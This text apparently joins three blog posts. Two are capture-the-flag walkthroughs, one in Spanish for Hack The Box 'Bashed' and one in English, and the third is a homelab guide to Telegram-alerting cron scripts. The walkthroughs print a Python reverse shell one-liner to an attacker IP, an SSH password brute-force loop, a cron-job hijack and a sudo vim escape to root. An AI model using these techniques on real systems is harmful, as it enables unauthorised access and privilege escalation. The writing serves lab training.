Felicitaciones! Si llegaste hasta aca es porque lograste hacer el root de la maquina Bank de Hack The Box. Espero que hayas aprendido algo nuevo.

Si tenes alguna duda o consideras que algo se puede mejorar me podes contactar atravez de mis redes

Si necesitas ayuda con escenarios mas dificiles o simplemente queres compartir sobre lo que te gusta en comunidad, te invito a unirte a HTB Argentina

Hoy vamos a hacer la maquina Bashed la cual es una maquina retirada, dificultad EASY.

Requerimientos para esta maquina:

• nmap
• dirsearch/feroxbuster (o similar)
• conocimientos basicos de programacion
• wordlists

Links utiles 🔗

• https://www.revshells.com/
• https://github.com/y3rb1t4/htb-arg/blob/main/00-my-notes/shell-interactive.md
• https://www.kali.org/tools/feroxbuster/
• https://github.com/DominicBreuker/pspy?tab=readme-ov-file

User Flag 🧑

Primero vamos a empezar por scanear la maquina con nmap:

nmap --open -T4 --min-rate 5000 -sV -o open -Pn 10.10.10.68

Esto nos va a dar como resultado lo siguiente:

Nmap scan report for 10.10.10.68 (10.10.10.68)
Host is up (0.25s latency).
Not shown: 906 closed ports, 93 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Feb 18 20:32:21 2024 -- 1 IP address (1 host up) scanned in 15.96 seconds

Con la informacion de que solo el puerto 80 esta abierto, nos vamos a dirigir a la pagina web y ver que podemos encontrar.

Por lo visto es una app llamada phpbash, la cual se usa para ejecutar bash desde el navegador. Como ya nos encontramos en el index y no veo ninguna otra url, vamos a intentar buscar directorios con feroxbuster:

feroxbuster --insecure -u http://10.10.10.68/ -m GET,PUT,POST -o ferox -w ~/Documents/Security/wordlists/common.txt

Dentro de la respuesta larga que obtuvimos hay una url que me resulta interesante la cual es http://10.10.10.68/dev/phpbash.php. Vamos a entrar a esa url.

Efectivamente tenemos una shell aca, vamos a aprovechar y hacer una reverse shell para obtener acceso a la maquina.

Desde nuestra maquina

nc -lvnp 4444

Desde la terminal web

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.11",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'

Una vez que tenemos acceso a la maquina, vamos a estabilizar la shell.

python3 -c 'import pty; pty.spawn("/bin/bash")'
script /dev/null -c bash
CTRL + Z
stty raw -echo ; fg
export TERM=xterm
export SHELL=bash

Para encontrar el user.txt lo que hice primero fue hacer un cd /home para ver los usuarios de ahi intente entrar a la home de ambos, tanto arrexels como scriptmanager. En la de arrexels encontre el user.txt.

Root Flag 🖥

Ahora para la root, vamos a intentar algo simple, sudo -l para ver que podemos hacer con sudo.

Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL

Asi que lo primero que vamos a hacer es pasarnos a scriptmanager con sudo -u scriptmanager /bin/bash y luego vamos a ver que podemos hacer con este usuario.

Viendo el root, hay una carpeta que solo el usuario scriptmanager puede acceder la misma se llama scripts y dentro de ella hay un archivo llamado test.py.

f = open("test.txt", "w")
f.write("testing 123!")
f.close

No tiene nada interesante, veamos si este archivo se esta usando en algun lado, para eso vamos a usar una herramienta llamada pspy la cual nos va a mostrar los llamados de este archivo en sus procesos.

Para eso vamos a necesitar subir esto, como las maquinas de htb no resuelven github como para poder hacer un wget, vamos a tener que hacer un python -m http.server y luego hacer un wget desde la maquina.

Desde nuestra maquina

python -m http.server 8000

Desde la maquina de htb

wget <ip>:8000/pspy64

Ahora desde la maquina de htb

chmod +x pspy64
./pspy64 test.py

2024/02/19 16:46:09 CMD: UID=0     PID=1      | /sbin/init noprompt 2024/02/19 16:47:01 CMD: UID=0     PID=1502   | python test.py 
2024/02/19 16:47:01 CMD: UID=0     PID=1501   | /bin/sh -c cd /scripts; for f in *.py; do python "$f"; done 
2024/02/19 16:47:01 CMD: UID=0     PID=1500   | /usr/sbin/CRON -f

Esperando un rato por lo visto hay un cronjob que esta ejecutando todos los archivos .py que estan en la carpeta scripts. Vamos a hacer un script sencillo para obtener el root flag.

import os; os.system('cat /root/root.txt >> flag.txt')

Con esto cuando el cronjob se ejecute, va a escribir el contenido de root.txt en flag.txt.

Conclusion 🏁

Felicitaciones! Si llegaste hasta aca es porque lograste hacer el root de la maquina Bashed de Hack The Box. Espero que hayas aprendido algo nuevo.

Si tenes alguna duda o consideras que algo se puede mejorar me podes contactar atravez de mis redes

Si necesitas ayuda con escenarios mas dificiles o simplemente queres compartir sobre lo que te gusta en comunidad, te invito a unirte a HTB Argentina

Port scan 🔍

First we start by scanning the ports

nmap -p- -T4 --min-rate 5000 -vvv -o fullscan 10.10.226.232

-p1- means all ports -T4 is for an aggressive scan --min-rate 5000 is used to tell how many packages per second are we sending -vvv is verbose -o is for file output

# Nmap 7.80 scan initiated Fri Feb 16 00:10:54 2024 as: nmap -p- -T4 --min-rate 5000 -vvv -o fullscan 10.10.226.232
Nmap scan report for 10.10.226.232 (10.10.226.232)
Host is up, received syn-ack (0.27s latency).
Scanned at 2024-02-16 00:10:54 -03 for 42s
Not shown: 65532 filtered ports
Reason: 65532 no-responses
PORT     STATE SERVICE      REASON
21/tcp   open  ftp          syn-ack
80/tcp   open  http         syn-ack
2222/tcp open  EtherNetIP-1 syn-ack

Read data files from: /usr/bin/../share/nmap
# Nmap done at Fri Feb 16 00:11:36 2024 -- 1 IP address (1 host up) scanned in 41.57 seconds

FTP Anonymous login 🤿

Now since there is a port open at 21, we can try to do a anonymous login.

ftp 10.10.226.232
Connected to 10.10.226.232.
220 (vsFTPd 3.0.3)
Name (10.10.226.232:user): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

Now we are inside! We can verify by running a command like ls

ftp> ls
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Aug 17  2019 pub
226 Directory send OK.
ftp>

If we see something like passive mode, just type passive and will enter active mode.

If we dig inside the folder pub there is a file called ForMitch.txt we are going to download that with get <file_name>

And in our local computer we do a cat <file_name>

We got the following response

Dammit man... you'te the worst dev i've seen. You set the same pass for the system user, and the password is so weak... i cracked it in seconds. Gosh... what a mess!

Brute force 👊

So we know that their user is the same for the system and that contains a weak password

Since the message mentions a name we are going to asume that the user is mitch, now we should try to brute force the password.

I'm going to use a package called sshpass in order to send the password from a wordlist that I got from internet and create a simple script like this

#!/bin/bash

for password in $(cat weak_passwords.txt); do
    echo "Trying password: $password"
    sshpass -p$password ssh -p 2222 -o StrictHostKeyChecking=no -o IdentitiesOnly=yes mitch@10.10.226.232
done

After a long time trying I got the password!

Obtain the flags 🏁

If we do a ls we can see that the user.txt flag is there, take it and continue!

One of the first things you always do in a system (even before trying things like linpeas) is to do a simple sudo -l to see if there is something that can be run with sudo.

$ sudo -l
User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim

And of course there he's, we can use sudo vim

Lets do a sudo vim then type : and after ! ls /root and press enter, with this we are going to see if the root flag is there.

$ sudo vim

root.txt

And there it is! just like before but this time with ! cat /root/root.txt

Congratulations you got your flag!

Anything mentioned here can be found in this repository

In this blog post I will show you how do I use multiple bash scripts with cronjobs to monitor a few things of my homelab.

What is cronjob? 🤔

Cron is a time-based job scheduler in Unix-like computer operating systems. Users that set up and maintain software environments use cron to schedule jobs to run periodically at fixed times, dates, or intervals.

What is bash scripting? 🤔

Bash is a Unix shell and command language written used by the GNU Project as a free software replacement for the Bourne shell.

Requirements 🧰

• self-hosted server
• telegram account
• curl

Decide what you want to monitor 📝

In this example I will show you how do I monitor one of my services cloudflared which is a reverse tunnel to my homelab. I want to be notified when something goes wrong with it.

First example 📝

#!/bin/bash
# 0 * * * * alerts
# alias alerts='sh $HOME/scripts/alerts.sh'

TOKEN=""
CHAT_ID=""

echo "🛑 Checking if cloudflared is running"

## https://www.cyberciti.biz/faq/systemd-systemctl-list-all-failed-units-services-on-linux/
isRunning=$(systemctl is-active cloudflared)

if [ "$isRunning" != "active" ]; then
    echo "🚨 cloudflared is not running"
    curl -X POST -H "content-type: application/json" -d "{\"chat_id\": \"$CHAT_ID\", \"text\": \"🚨 cloudflared is not running\", \"disable_notification\": true}" https://api.telegram.org/bot"$TOKEN"/sendMessage
    exit 1
fi

echo "🛑 Running monitor"
monitor=$(journalctl -u cloudflared -S "$(date -d "-1 hour" +%Y"-%m-%d "%T)" | awk '/ERR/' | tail -n 5)

if [ -z "$monitor" ]; then
    echo "✅ No errors found"
    exit 0
fi

echo "🚨 Error found"

curl -X POST -H "content-type: application/json" -d "{\"chat_id\": \"$CHAT_ID\", \"text\": \"🚨 Error: $monitor\", \"disable_notification\": true}" https://api.telegram.org/bot"$TOKEN"/sendMessage

At the top of the script we have shebang #!/bin/bash which tells the system that this is a bash script. Then we have two variables TOKEN and CHAT_ID which are used to send messages to telegram. You can get your token from BotFather and your chat id from IDBot. Then we have a few echo commands which are used to print out some text in the terminal. Then we have isRunning variable which checks if the service is running. If it's not running then we send a message to telegram and exit the script. If it's running then we run monitor variable which checks for errors in the last hour. If there are no errors then we exit the script. If there are errors then we send a message to telegram.

Second example 📝

This one is running something like this ->

0 * * * * sh $HOME/scripts/alerts.sh >> $HOME/logs/alert.log

The end result is this ->

The good thing is you can have channels for multiple purposes. These are the ones I have ->

For the backup script I'll do this ->

#!/bin/bash
# Usage 'backup directory/*'
# 0 3 * * 1 backup $HOME/www/*
# alias backup='sh $HOME/scripts/backup.sh'

TOKEN=""
CHAT_ID=""

if [ "$#" -eq 0 ]; then
    echo "🟩 Usage: $0 directory/*"
    exit 1
fi

if ! [ -x "$(command -v curl)" ]; then
    echo "❌ Error: curl is not installed." >&2
    exit 1
fi

# https://unix.stackexchange.com/questions/24630/whats-the-best-way-to-join-files-again-after-splitting-them
date=$(date +%F)
tar -zcvf backup-"$date".tar.gz "$@"
split --bytes=49M backup-"$date".tar.gz

# https://gist.github.com/HirbodBehnam/d7a46fac29f5e1f664d467d5a05620dd
for file in x*; do
    echo "💾 Uploading $file"
    curl -X POST -H "content-type: application/json" -d "{\"chat_id\": \"$CHAT_ID\", \"text\": \"Date: $date\nFile: $file\", \"disable_notification\": true}" https://api.telegram.org/bot"$TOKEN"/sendMessage
    curl -X POST -H "content-type: multipart/form-data" -F document=@"$file" -F chat_id="$CHAT_ID" https://api.telegram.org/bot"$TOKEN"/sendDocument
done

rm backup-"$date".tar.gz x*
echo "🚀 Backup completed!"

Note that I'm compressing the files and then splitting them into 49MB chunks. This is because telegram has a limit of 50MB per file. Then I'm sending the files to telegram. If I need them at one piece I can use cat x* > backup.tar.gz to join them back.

Conclusion 📝

As you may see this is a very simple way to monitor your services and get notified when something goes wrong. You can use this for anything you want. I'm using this for my backups, services, etc. You can also use this to monitor your server's resources like CPU, RAM, etc. You can also use this to monitor your website's uptime. The possibilities are endless.

Bonus 🎉

Want to monitor from outside your infrastructure? You should look into openstatus it has a small free tier, a incredible user experience, incident management and multiple locations to monitor from.